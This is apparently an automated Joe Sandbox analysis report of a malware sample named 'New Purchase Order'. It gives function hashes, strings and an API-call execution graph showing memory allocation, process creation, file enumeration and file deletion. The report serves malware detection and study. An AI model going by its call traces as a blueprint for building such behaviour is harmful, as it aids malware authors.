                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: f2b449105eb23cb2371b2896014cc4d11b08921145cd4b9042ec6ff0149a4951
                                                          • Instruction ID: 9781accff860470a9cf1d571e7afa230418fdc9d9ce384147aa4aa9ff8ff6079
                                                          • Opcode Fuzzy Hash: f2b449105eb23cb2371b2896014cc4d11b08921145cd4b9042ec6ff0149a4951
                                                          • Instruction Fuzzy Hash: 21318672A00219AFDB20DE2DCC44BEFF7F8EF45610F954655E949E3205EB309A448BA0
                                                          Function 01737D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          • API String ID: 1302938615-2137968064
                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction ID: eccb426257b50c79b71b0d95b7a5c690f980828cee2368a6fdd2c2781d9414b7
                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction Fuzzy Hash: 4A91A5B1E4021B9BEF28DF6DC8816BEFBA1BFC4320F54461AE955E72C6D73089418761
                                                          Function 016F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: 6eb0c72d872ee0786fe4d3fd3c4a3469cdc5903ffd86f9f3d750487fb02e5f63
                                                          • Instruction ID: ab3f21b2cc8b1335f55c3af588e4b50b6012a5a139f3dd1d1396f36e87f7af54
                                                          • Opcode Fuzzy Hash: 6eb0c72d872ee0786fe4d3fd3c4a3469cdc5903ffd86f9f3d750487fb02e5f63
                                                          • Instruction Fuzzy Hash: DF812A71D00269DBDB31CB54CC44BEEBBB4AB48714F0041EAEA09B7281E7709E84CFA0

                                                          Execution Graph

                                                          Execution Coverage:2.6%
                                                          Dynamic/Decrypted Code Coverage:4.3%
                                                          Signature Coverage:1.6%
                                                          Total number of Nodes:440
                                                          Total number of Limit Nodes:70
                                                          execution_graph 97836 2fa0d3b PostThreadMessageW 97837 2fa0d4d 97836->97837 97683 2fa9aff 97684 2fa9b0f 97683->97684 97686 2fa9b16 97684->97686 97687 2fbb480 97684->97687 97690 2fb9720 97687->97690 97689 2fbb499 97689->97686 97691 2fb973a 97690->97691 97692 2fb974b RtlFreeHeap 97691->97692 97692->97689 97840 2fa5ab0 97845 2fa7fe0 97840->97845 97842 2fa5ae0 97844 2fa5b0c 97842->97844 97849 2fa7f60 97842->97849 97846 2fa7ff3 97845->97846 97856 2fb8900 97846->97856 97848 2fa801e 97848->97842 97850 2fa7fa4 97849->97850 97851 2fa7fc5 97850->97851 97862 2fb86d0 97850->97862 97851->97842 97853 2fa7fb5 97854 2fa7fd1 97853->97854 97867 2fb93a0 97853->97867 97854->97842 97857 2fb8981 97856->97857 97858 2fb892e 97856->97858 97861 5252dd0 LdrInitializeThunk 97857->97861 97858->97848 97859 2fb89a6 97859->97848 97861->97859 97863 2fb8750 97862->97863 97864 2fb86fe 97862->97864 97870 5254650 LdrInitializeThunk 97863->97870 97864->97853 97865 2fb8775 97865->97853 97868 2fb93ba 97867->97868 97869 2fb93cb NtClose 97868->97869 97869->97851 97870->97865 97871 2fa7030 97872 2fa7049 97871->97872 97876 2fa709c 97871->97876 97874 2fb93a0 NtClose 97872->97874 97872->97876 97873 2fa71d4 97875 2fa7064 97874->97875 97881 2fa6450 NtClose LdrInitializeThunk LdrInitializeThunk 97875->97881 97876->97873 97882 2fa6450 NtClose LdrInitializeThunk LdrInitializeThunk 97876->97882 97878 2fa71ae 97878->97873 97883 2fa6620 NtClose LdrInitializeThunk LdrInitializeThunk 97878->97883 97881->97876 97882->97878 97883->97873 97884 2faf730 97885 2faf794 97884->97885 97913 2fa61c0 97885->97913 97887 2faf8ce 97888 2faf8c7 97888->97887 97920 2fa62d0 97888->97920 97890 2fafa73 97891 2faf94a 97891->97890 97892 2fafa82 97891->97892 97924 2faf510 97891->97924 97893 2fb93a0 NtClose 97892->97893 97895 2fafa8c 97893->97895 97896 2faf986 97896->97892 97897 2faf991 97896->97897 97898 2fbb560 RtlAllocateHeap 97897->97898 97899 2faf9ba 97898->97899 97900 2faf9d9 97899->97900 97901 2faf9c3 97899->97901 97933 2faf400 97900->97933 97902 2fb93a0 NtClose 97901->97902 97904 2faf9cd 97902->97904 97905 2faf9e7 97937 2fb8e60 97905->97937 97907 2fafa62 97908 2fb93a0 NtClose 97907->97908 97909 2fafa6c 97908->97909 97910 2fbb480 RtlFreeHeap 97909->97910 97910->97890 97911 2fafa05 97911->97907 97912 2fb8e60 LdrInitializeThunk 97911->97912 97912->97911 97914 2fa61f3 97913->97914 97915 2fa6217 97914->97915 97941 2fb8f00 97914->97941 97915->97888 97917 2fa623a 97917->97915 97918 2fb93a0 NtClose 97917->97918 97919 2fa62ba 97918->97919 97919->97888 97921 2fa62f5 97920->97921 97946 2fb8d10 97921->97946 97925 2faf52c 97924->97925 97926 2fa4460 LdrLoadDll 97925->97926 97928 2faf54a 97926->97928 97927 2faf553 97927->97896 97928->97927 97929 2fa4460 LdrLoadDll 97928->97929 97930 2faf61e 97929->97930 97931 2fa4460 LdrLoadDll 97930->97931 97932 2faf678 97930->97932 97931->97932 97932->97896 97934 2faf412 CoInitialize 97933->97934 97936 2faf465 97934->97936 97935 2faf4fb CoUninitialize 97935->97905 97936->97935 97938 2fb8e7a 97937->97938 97951 5252ba0 LdrInitializeThunk 97938->97951 97939 2fb8eaa 97939->97911 97942 2fb8f1d 97941->97942 97945 5252ca0 LdrInitializeThunk 97942->97945 97943 2fb8f49 97943->97917 97945->97943 97947 2fb8d2a 97946->97947 97950 5252c60 LdrInitializeThunk 97947->97950 97948 2fa6369 97948->97891 97950->97948 97951->97939 97693 2fb5f70 97694 2fb5fca 97693->97694 97696 2fb5fd7 97694->97696 97697 2fb3980 97694->97697 97704 2fbb3f0 97697->97704 97699 2fb39be 97702 2fb3ace 97699->97702 97707 2fa4460 97699->97707 97701 2fb3a50 Sleep 97703 2fb3a04 97701->97703 97702->97696 97703->97701 97703->97702 97711 2fb9510 97704->97711 97706 2fbb421 97706->97699 97708 2fa4484 97707->97708 97709 2fa44c0 LdrLoadDll 97708->97709 97710 2fa448b 97708->97710 97709->97710 97710->97703 97712 2fb95a8 97711->97712 97714 2fb953e 97711->97714 97713 2fb95be NtAllocateVirtualMemory 97712->97713 97713->97706 97714->97706 97952 2fb0030 97953 2fb0053 97952->97953 97954 2fa4460 LdrLoadDll 97953->97954 97955 2fb0077 97954->97955 97956 2fb8830 97957 2fb88c2 97956->97957 97959 2fb885e 97956->97959 97961 5252ee0 LdrInitializeThunk 97957->97961 97958 2fb88f3 97961->97958 97967 2fb89b0 97968 2fb89cd 97967->97968 97971 5252df0 LdrInitializeThunk 97968->97971 97969 2fb89f5 97971->97969 97972 2f99e36 97973 2f99e0c 97972->97973 97977 2f99e39 97972->97977 97974 2f99e30 97973->97974 97975 2f99e1d CreateThread 97973->97975 97976 2f9a592 97977->97976 97979 2fbb0e0 97977->97979 97980 2fbb106 97979->97980 97985 2f94020 97980->97985 97982 2fbb112 97983 2fbb14b 97982->97983 97988 2fb5500 97982->97988 97983->97976 97992 2fa3120 97985->97992 97987 2f9402d 97987->97982 97989 2fb5562 97988->97989 97991 2fb556f 97989->97991 98003 2fa1910 97989->98003 97991->97983 97993 2fa313d 97992->97993 97995 2fa3156 97993->97995 97996 2fb9e10 97993->97996 97995->97987 97998 2fb9e2a 97996->97998 97997 2fb9e59 97997->97995 97998->97997 97999 2fb8a00 LdrInitializeThunk 97998->97999 98000 2fb9eb9 97999->98000 98001 2fbb480 RtlFreeHeap 98000->98001 98002 2fb9ed2 98001->98002 98002->97995 98004 2fa194b 98003->98004 98019 2fa7d70 98004->98019 98006 2fa1953 98007 2fbb560 RtlAllocateHeap 98006->98007 98018 2fa1c1d 98006->98018 98008 2fa1969 98007->98008 98009 2fbb560 RtlAllocateHeap 98008->98009 98010 2fa197a 98009->98010 98011 2fbb560 RtlAllocateHeap 98010->98011 98012 2fa1988 98011->98012 98013 2fa1a1f 98012->98013 98034 2fa6920 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98012->98034 98015 2fa4460 LdrLoadDll 98013->98015 98016 2fa1bd2 98015->98016 98030 2fb7e40 98016->98030 98018->97991 98020 2fa7d9c 98019->98020 98035 2fa7c60 98020->98035 98023 2fa7dc9 98025 2fa7dd4 98023->98025 98027 2fb93a0 NtClose 98023->98027 98024 2fa7de1 98026 2fa7dfd 98024->98026 98028 2fb93a0 NtClose 98024->98028 98025->98006 98026->98006 98027->98025 98029 2fa7df3 98028->98029 98029->98006 98031 2fb7ea2 98030->98031 98033 2fb7eaf 98031->98033 98046 2fa1c30 98031->98046 98033->98018 98034->98013 98036 2fa7d56 98035->98036 98037 2fa7c7a 98035->98037 98036->98023 98036->98024 98041 2fb8aa0 98037->98041 98040 2fb93a0 NtClose 98040->98036 98042 2fb8abd 98041->98042 98045 52535c0 LdrInitializeThunk 98042->98045 98043 2fa7d4a 98043->98040 98045->98043 98062 2fa8040 98046->98062 98048 2fa21a6 98048->98033 98049 2fa1c50 98049->98048 98066 2fb1060 98049->98066 98052 2fa1e64 98074 2fbc650 98052->98074 98053 2fa1cae 98053->98048 98069 2fbc520 98053->98069 98055 2fa7fe0 LdrInitializeThunk 98058 2fa1ec9 98055->98058 98056 2fa1e79 98056->98058 98080 2fa0760 98056->98080 98058->98048 98058->98055 98060 2fa0760 LdrInitializeThunk 98058->98060 98059 2fa7fe0 LdrInitializeThunk 98061 2fa2023 98059->98061 98060->98058 98061->98058 98061->98059 98063 2fa804d 98062->98063 98064 2fa806e SetErrorMode 98063->98064 98065 2fa8075 98063->98065 98064->98065 98065->98049 98067 2fbb3f0 NtAllocateVirtualMemory 98066->98067 98068 2fb1081 98067->98068 98068->98053 98070 2fbc530 98069->98070 98071 2fbc536 98069->98071 98070->98052 98072 2fbb560 RtlAllocateHeap 98071->98072 98073 2fbc55c 98072->98073 98073->98052 98075 2fbc5c0 98074->98075 98076 2fbb560 RtlAllocateHeap 98075->98076 98078 2fbc61d 98075->98078 98077 2fbc5fa 98076->98077 98079 2fbb480 RtlFreeHeap 98077->98079 98078->98056 98079->98078 98081 2fa077c 98080->98081 98084 2fb9640 98081->98084 98085 2fb965a 98084->98085 98088 5252c70 LdrInitializeThunk 98085->98088 98086 2fa0782 98086->98061 98088->98086 97715 2fac4e0 97716 2fac509 97715->97716 97717 2fac60d 97716->97717 97718 2fac5b3 FindFirstFileW 97716->97718 97718->97717 97720 2fac5ce 97718->97720 97719 2fac5f4 FindNextFileW 97719->97720 97721 2fac606 FindClose 97719->97721 97720->97719 97721->97717 98090 2fb90a0 98091 2fb915a 98090->98091 98093 2fb90d2 98090->98093 98092 2fb9170 NtCreateFile 98091->98092 98094 2fb1a20 98095 2fb1a39 98094->98095 98096 2fb1a84 98095->98096 98099 2fb1ac4 98095->98099 98101 2fb1ac9 98095->98101 98097 2fbb480 RtlFreeHeap 98096->98097 98098 2fb1a94 98097->98098 98100 2fbb480 RtlFreeHeap 98099->98100 98100->98101 98102 2fa3013 98103 2fa7c60 2 API calls 98102->98103 98104 2fa3023 98103->98104 98105 2fb93a0 NtClose 98104->98105 98106 2fa303f 98104->98106 98105->98106 98107 2fa6c90 98108 2fa6cba 98107->98108 98111 2fa7e10 98108->98111 98110 2fa6ce1 98112 2fa7e2d 98111->98112 98118 2fb8af0 98112->98118 98114 2fa7e7d 98115 2fa7e84 98114->98115 98123 2fb8bd0 98114->98123 98115->98110 98117 2fa7ead 98117->98110 98119 2fb8b8b 98118->98119 98121 2fb8b1b 98118->98121 98128 5252f30 LdrInitializeThunk 98119->98128 98120 2fb8bc4 98120->98114 98121->98114 98124 2fb8c84 98123->98124 98125 2fb8c02 98123->98125 98129 5252d10 LdrInitializeThunk 98124->98129 98125->98117 98126 2fb8cc9 98126->98117 98128->98120 98129->98126 98130 2fb1690 98131 2fb16ac 98130->98131 98132 2fb16e8 98131->98132 98133 2fb16d4 98131->98133 98135 2fb93a0 NtClose 98132->98135 98134 2fb93a0 NtClose 98133->98134 98136 2fb16dd 98134->98136 98137 2fb16f1 98135->98137 98140 2fbb5a0 RtlAllocateHeap 98137->98140 98139 2fb16fc 98140->98139 98141 2fb9210 98142 2fb92b7 98141->98142 98144 2fb923b 98141->98144 98143 2fb92cd NtReadFile 98142->98143 98145 2fa2688 98146 2fa269f 98145->98146 98147 2fa61c0 2 API calls 98146->98147 98148 2fa26b3 98147->98148 98149 2fa7289 98150 2fa728e 98149->98150 98152 2fa7232 98149->98152 98150->98150 98151 2fa727f 98152->98151 98154 2fab170 98152->98154 98155 2fab196 98154->98155 98156 2fab3c6 98155->98156 98181 2fb97b0 98155->98181 98156->98151 98158 2fab20c 98158->98156 98159 2fbc650 2 API calls 98158->98159 98160 2fab22b 98159->98160 98160->98156 98161 2fab2ff 98160->98161 98162 2fb8a00 LdrInitializeThunk 98160->98162 98163 2fa5a30 LdrInitializeThunk 98161->98163 98165 2fab31e 98161->98165 98164 2fab28a 98162->98164 98163->98165 98164->98161 98166 2fab293 98164->98166 98180 2fab3ae 98165->98180 98187 2fb8570 98165->98187 98166->98156 98173 2fab2c5 98166->98173 98175 2fab2e7 98166->98175 98184 2fa5a30 98166->98184 98167 2fa7fe0 LdrInitializeThunk 98171 2fab2f5 98167->98171 98171->98151 98172 2fa7fe0 LdrInitializeThunk 98176 2fab3bc 98172->98176 98202 2fb4690 LdrInitializeThunk 98173->98202 98174 2fab385 98192 2fb8620 98174->98192 98175->98167 98176->98151 98178 2fab39f 98197 2fb8780 98178->98197 98180->98172 98182 2fb97cd 98181->98182 98183 2fb97de CreateProcessInternalW 98182->98183 98183->98158 98185 2fb8bd0 LdrInitializeThunk 98184->98185 98186 2fa5a6e 98185->98186 98186->98173 98188 2fb85f0 98187->98188 98190 2fb859e 98187->98190 98203 52539b0 LdrInitializeThunk 98188->98203 98189 2fb8615 98189->98174 98190->98174 98193 2fb86a0 98192->98193 98195 2fb864e 98192->98195 98204 5254340 LdrInitializeThunk 98193->98204 98194 2fb86c5 98194->98178 98195->98178 98198 2fb87ab 98197->98198 98199 2fb87fd 98197->98199 98198->98180 98205 5252fb0 LdrInitializeThunk 98199->98205 98200 2fb8822 98200->98180 98202->98175 98203->98189 98204->98194 98205->98200 98206 5252ad0 LdrInitializeThunk 97727 2fa2242 97728 2fa2202 97727->97728 97730 2fa220b 97727->97730 97731 2fb9440 97728->97731 97732 2fb94cf 97731->97732 97733 2fb946b 97731->97733 97736 5252e80 LdrInitializeThunk 97732->97736 97733->97730 97734 2fb9500 97734->97730 97736->97734 98207 2f9b400 98208 2fbb3f0 NtAllocateVirtualMemory 98207->98208 98209 2f9ca71 98208->98209 97737 2faac40 97742 2faa950 97737->97742 97739 2faac4d 97756 2faa5c0 97739->97756 97741 2faac69 97743 2faa975 97742->97743 97767 2fa8250 97743->97767 97746 2faaac0 97746->97739 97748 2faaad7 97748->97739 97749 2faaace 97749->97748 97751 2faabc5 97749->97751 97786 2faa010 97749->97786 97753 2faac2a 97751->97753 97795 2faa380 97751->97795 97754 2fbb480 RtlFreeHeap 97753->97754 97755 2faac31 97754->97755 97755->97739 97757 2faa5d6 97756->97757 97764 2faa5e1 97756->97764 97758 2fbb560 RtlAllocateHeap 97757->97758 97758->97764 97759 2faa608 97759->97741 97760 2fa8250 GetFileAttributesW 97760->97764 97761 2faa922 97762 2faa93b 97761->97762 97763 2fbb480 RtlFreeHeap 97761->97763 97762->97741 97763->97762 97764->97759 97764->97760 97764->97761 97765 2faa010 RtlFreeHeap 97764->97765 97766 2faa380 RtlFreeHeap 97764->97766 97765->97764 97766->97764 97768 2fa8271 97767->97768 97769 2fa8278 GetFileAttributesW 97768->97769 97770 2fa8283 97768->97770 97769->97770 97770->97746 97771 2fb3270 97770->97771 97772 2fb327e 97771->97772 97773 2fb3285 97771->97773 97772->97749 97774 2fa4460 LdrLoadDll 97773->97774 97775 2fb32ba 97774->97775 97776 2fb32c9 97775->97776 97802 2fb2d30 LdrLoadDll 97775->97802 97782 2fb3474 97776->97782 97799 2fbb560 97776->97799 97779 2fb32e2 97780 2fb346a 97779->97780 97779->97782 97783 2fb32fe 97779->97783 97781 2fbb480 RtlFreeHeap 97780->97781 97780->97782 97781->97782 97782->97749 97783->97782 97784 2fbb480 RtlFreeHeap 97783->97784 97785 2fb345e 97784->97785 97785->97749 97787 2faa036 97786->97787 97806 2fada50 97787->97806 97789 2faa0a8 97791 2faa230 97789->97791 97792 2faa0c6 97789->97792 97790 2faa215 97790->97749 97791->97790 97793 2fa9ed0 RtlFreeHeap 97791->97793 97792->97790 97811 2fa9ed0 97792->97811 97793->97791 97796 2faa3a6 97795->97796 97797 2fada50 RtlFreeHeap 97796->97797 97798 2faa42d 97797->97798 97798->97751 97803 2fb96d0 97799->97803 97801 2fbb57b 97801->97779 97802->97776 97804 2fb96ea 97803->97804 97805 2fb96fb RtlAllocateHeap 97804->97805 97805->97801 97807 2fada74 97806->97807 97808 2fada81 97807->97808 97809 2fbb480 RtlFreeHeap 97807->97809 97808->97789 97810 2fadac4 97809->97810 97810->97789 97812 2fa9eed 97811->97812 97815 2fadae0 97812->97815 97814 2fa9ff3 97814->97792 97816 2fadb04 97815->97816 97817 2fadbae 97816->97817 97818 2fbb480 RtlFreeHeap 97816->97818 97817->97814 97818->97817 97819 2fa21c0 97824 2fb8a00 97819->97824 97822 2fb9440 LdrInitializeThunk 97823 2fa220b 97822->97823 97825 2fb8a1d 97824->97825 97828 5252c0a 97825->97828 97826 2fa21f6 97826->97822 97829 5252c11 97828->97829 97830 5252c1f LdrInitializeThunk 97828->97830 97829->97826 97830->97826 98210 2fbc580 98211 2fbb480 RtlFreeHeap 98210->98211 98212 2fbc595 98211->98212 98213 2fb8300 98214 2fb831a 98213->98214 98215 2fb832b RtlDosPathNameToNtPathName_U 98214->98215 98216 2fb9300 98217 2fb9377 98216->98217 98219 2fb932b 98216->98219 98218 2fb938d NtDeleteFile 98217->98218 98220 2fa8704 98222 2fa8714 98220->98222 98221 2fa86c1 98222->98221 98224 2fa6fb0 98222->98224 98225 2fa6fc6 98224->98225 98227 2fa6fff 98224->98227 98225->98227 98228 2fa6e20 LdrLoadDll 98225->98228 98227->98221 98228->98227

                                                          Executed Functions

                                                          Function 02F99E40 Relevance: 26.6, Strings: 21, Instructions: 384COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 118 2f99e40-2f9a152 119 2f9a15c-2f9a163 118->119 120 2f9a19e 119->120 121 2f9a165-2f9a19c 119->121 122 2f9a1a5-2f9a1af 120->122 121->119 123 2f9a1b1-2f9a1cb 122->123 124 2f9a1e7-2f9a1f0 122->124 125 2f9a1cd-2f9a1d1 123->125 126 2f9a1d2-2f9a1d4 123->126 127 2f9a1f2-2f9a204 124->127 128 2f9a206-2f9a210 124->128 125->126 129 2f9a1e5 126->129 130 2f9a1d6-2f9a1df 126->130 127->124 131 2f9a221-2f9a22d 128->131 129->122 130->129 132 2f9a23d-2f9a241 131->132 133 2f9a22f-2f9a23b 131->133 134 2f9a25c-2f9a274 132->134 135 2f9a243-2f9a25a 132->135 133->131 137 2f9a285-2f9a291 134->137 135->132 138 2f9a2a8-2f9a2b2 137->138 139 2f9a293-2f9a2a6 137->139 140 2f9a2c3-2f9a2cf 138->140 139->137 142 2f9a2d1-2f9a2e3 140->142 143 2f9a2e5-2f9a2ee 140->143 142->140 144 2f9a510-2f9a517 143->144 145 2f9a2f4-2f9a2f7 143->145 147 2f9a519-2f9a548 144->147 148 2f9a54a-2f9a551 144->148 149 2f9a2fd-2f9a304 145->149 147->144 150 2f9a5c3-2f9a5cd 148->150 151 2f9a553-2f9a55d 148->151 152 2f9a32b-2f9a335 149->152 153 2f9a306-2f9a329 149->153 155 2f9a5de-2f9a5e7 150->155 156 2f9a56e-2f9a57a 151->156 154 2f9a346-2f9a352 152->154 153->149 157 2f9a365-2f9a36c 154->157 158 2f9a354-2f9a363 154->158 159 2f9a5e9-2f9a5fc 155->159 160 2f9a5fe-2f9a607 155->160 161 2f9a58d call 2fbb0e0 156->161 162 2f9a57c-2f9a58b 156->162 163 2f9a36e-2f9a391 157->163 164 2f9a393-2f9a39d 157->164 158->154 159->155 170 2f9a592-2f9a59e 161->170 167 2f9a55f-2f9a568 162->167 163->157 169 2f9a3ae-2f9a3ba 164->169 167->156 172 2f9a3cb-2f9a3da 169->172 173 2f9a3bc-2f9a3c9 169->173 170->150 171 2f9a5a0-2f9a5c1 170->171 171->170 174 2f9a40d-2f9a417 172->174 175 2f9a3dc-2f9a3e3 172->175 173->169 177 2f9a428-2f9a434 174->177 178 2f9a408 175->178 179 2f9a3e5-2f9a3fb 175->179 180 2f9a44a-2f9a454 177->180 181 2f9a436-2f9a448 177->181 178->144 182 2f9a3fd-2f9a403 179->182 183 2f9a406 179->183 184 2f9a465-2f9a471 180->184 181->177 182->183 183->175 186 2f9a493-2f9a499 184->186 187 2f9a473-2f9a480 184->187 190 2f9a49d-2f9a4a4 186->190 188 2f9a491 187->188 189 2f9a482-2f9a48b 187->189 188->184 189->188 192 2f9a4c9-2f9a4d3 190->192 193 2f9a4a6-2f9a4bc 190->193 194 2f9a4e4-2f9a4ed 192->194 195 2f9a4be-2f9a4c4 193->195 196 2f9a4c7 193->196 197 2f9a50b 194->197 198 2f9a4ef-2f9a4fb 194->198 195->196 196->190 197->143 199 2f9a509 198->199 200 2f9a4fd-2f9a503 198->200 199->194 200->199
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ")$#$#$$u$'$-$-~$.$@k$H$O($T$Z/$[5$]5$f?$pa$r$vj$}$K
                                                          • API String ID: 0-3922967351
                                                          • Opcode ID: 4f5297c37da48b17f1a590391c99fe6f1604f29743330c2930f42081600f4ba1
                                                          • Instruction ID: 8a7e91a9af0a3f7976e6b025c178d514f0f6ec7f14180a3d5802c3cda6bafe16
                                                          • Opcode Fuzzy Hash: 4f5297c37da48b17f1a590391c99fe6f1604f29743330c2930f42081600f4ba1
                                                          • Instruction Fuzzy Hash: 4D229BB0E05229CBEF24CF49C998BDDBBB2BB45348F1081D9C60D6B291D7B55A88CF54
                                                          Function 02FAC4E0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 02FAC5C4
                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 02FAC5FF
                                                          • FindClose.KERNELBASE(?), ref: 02FAC60A
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 3541575487-0
                                                          • Opcode ID: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                          • Instruction ID: 461b2231ea1e5ea517aa2ed0749822d6447d0fd6577ebffef8dafc4ae5d89600
                                                          • Opcode Fuzzy Hash: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                          • Instruction Fuzzy Hash: 3A3185B1900348BBDB21DF64CC95FFB777D9F44788F144559FA08A6180DB70AA848FA0
                                                          Function 02FB90A0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtCreateFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?,?,?), ref: 02FB91A1
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                          • Instruction ID: 5e5752b05df0eef65462177a912e30f70043a56e7b22b1b35355bfd995d8d017
                                                          • Opcode Fuzzy Hash: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                          • Instruction Fuzzy Hash: 5931D3B5A01608ABDB54DF99D880EEFB7F9AF8C300F108619F918A7340D730A951CFA4
                                                          Function 02FB9210 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtReadFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?), ref: 02FB92F6
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                          • Instruction ID: f2d0b6ab1492d9a28d6cf6ef66b5321cd63d5c064adb84f4c45e987717824816
                                                          • Opcode Fuzzy Hash: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                          • Instruction Fuzzy Hash: AD31D4B5A00609AFDB14DF99D880EEFB7F9AF88714F108219F918A7341D770A911CFA4
                                                          Function 02FB9510 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(02FA1CAE,9ACB2CF8,02FB7EAF,00000000,00000004,00003000,?,?,?,?,?,02FB7EAF,02FA1CAE), ref: 02FB95DB
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                          • Instruction ID: 54a683c9ab30c4894ebdab33270b429fcdbba0e9326504b419936048e18542aa
                                                          • Opcode Fuzzy Hash: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                          • Instruction Fuzzy Hash: B12127B5A00209ABDB10DFA9DC40EEFB7B9EF89300F104619FA18A7241D770A911CFA5
                                                          Function 02FB9300 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                          • Instruction ID: 770ca8a4fa17b0a5f8466352e5edf4e06aac7d28d615f215411bc4f211550d1d
                                                          • Opcode Fuzzy Hash: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                          • Instruction Fuzzy Hash: D411E0716016057EE620EB69DC41FEFB3ADEF8A700F10421DFA1867281DB75B9018BA5
                                                          Function 02FB93A0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02FB93D4
                                                          Memory Dump Source
